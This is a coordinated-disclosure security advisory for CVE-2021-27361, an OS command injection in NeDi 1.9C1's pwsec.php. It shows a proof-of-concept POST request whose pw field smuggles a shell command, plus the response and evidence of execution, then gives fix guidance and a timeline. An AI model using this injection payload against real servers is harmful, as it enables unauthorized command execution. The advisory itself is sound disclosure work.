############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: NeDi [1] # Vendor: NeDi # CSNC ID: CSNC-2021-003 # CVE ID: CVE-2021-27361 # Subject: OS Command Injection # Risk: High # Effect: Remotely exploitable # Author: Emanuele Barbeno # Date: 01.07.2021 # ############################################################# Introduction ------------ NeDi is an open source software tool which discovers, maps and inventories network devices and tracks connected end-nodes. Input parameters sent to the pwsec.php page and used to run operating system commands are not correctly validated by the application allowing arbitrary command execution on the server. [2] Affected -------- Vulnerable: * 1.9C1 Not vulnerable: * 2.0C No other version was tested, but it is believed for the older versions to be vulnerable as well. Technical Description --------------------- The pw parameter sent to the pwsec.php page is not sanitized before being used by the application. An authenticated user that send the following request is able to run arbitrary operating system commands executed with the privileges of the vulnerable application (www-data by default). The following HTTP request shows the attack. The chosen payload in the pw parameter creates a new file named test in the /tmp folder. To send this request a valid JSESSIONID cookies is required. ``` POST /pwsec.php HTTP/1.1 Host: mydomain.local Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4028.0 Safari/537.36 autochrome/red Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp, image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=jql6a7brdgb7f402nebkvih9l9 Content-Type: application/x-www-form-urlencoded Content-Length: 24 pw=abc';touch+'/tmp/test ``` Here the HTTP response showing that the server accepted the request: ``` HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 16 Feb 2021 21:46:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 604

Password Security

[CUT BY COMPASS]

``` After the previous request, it is possible to find the test file in the /tmp folder owned by the www-data user proving that the touch command has been executed: ``` $ ls -l /tmp/test -rw-r--r-- 1 www-data www-data 0 Feb 16 15:46 /tmp/test ``` In the pwsec.php file it is possible to find the PHP code responsible for this vulnerability. As shown below, the pw parameter is taken from the body of the request and passed to the system PHP function without any validation: ``` [CUT BY COMPASS] img src="img/16/lokc.png"> " onclick="select();" >

[CUT BY COMPASS] ``` Workaround / Fix ---------------- If possible, avoid calling OS commands directly and prefer using built-in library functions because they cannot be manipulated to perform tasks other than those they are intended to do. If the system command execution is still required, perform strict input validation on the input parameter using a whitelist approach to ensure that no malicious characters are sent. Prefer using escapeshellarg() or escapeshellcmd() PHP functions instead of exec(), system(), passthru(). [3] Timeline -------- 2021-02-16: Discovery by Emanuele Barbeno 2021-02-16: Initial vendor notification 2021-02-17: Initial vendor response 2021-02-17: Assigned CVE-2021-27361 2021-07-01: Coordinated public disclosure date References ---------- [1] https://www.nedi.ch/ [2] https://cwe.mitre.org/data/definitions/78.html [3] https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html